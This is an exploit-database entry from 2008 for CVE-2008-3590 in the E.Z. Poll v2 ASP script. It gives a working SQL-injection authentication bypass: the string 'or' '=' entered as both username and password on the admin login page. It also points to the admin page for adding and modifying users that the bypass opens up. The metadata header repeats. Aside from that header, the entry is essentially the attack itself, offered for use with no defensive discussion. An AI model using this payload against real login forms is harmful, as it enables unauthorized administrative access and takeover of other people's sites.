E.Z. Poll v.2 (Auth Bypass) Remote SQL Injection Vulnerability
| EDB-ID: 7315 | CVE: 2008-3590 | OSVDB-ID: 47325 |
| Author: t0fx | Published: 2008-12-01 | Verified:  |
Exploit Code:  |
Vulnerable App: N/A |
Rating |
| EDB-ID: 7315 | CVE: 2008-3590 | OSVDB-ID: 47325 |
| Author: t0fx | Published: 2008-12-01 | Verified: |
| Exploit Code: |
Vulnerable App: N/A |
Rating |
Description: ************* ***************** ************* ******************* E.Z. Poll <= v.2 script Remote SQL injection Exploit discovered by t0fx aka xtof69 vendor : E.Z. ************* ***************** ************* ******************* vulnerable page : http://www.site.com/admin/login.asp exploit : Username : 'or' '=' Password : 'or' '=' Add, modify user : /admin/admin-users.asp # milw0rm.com [2008-12-01]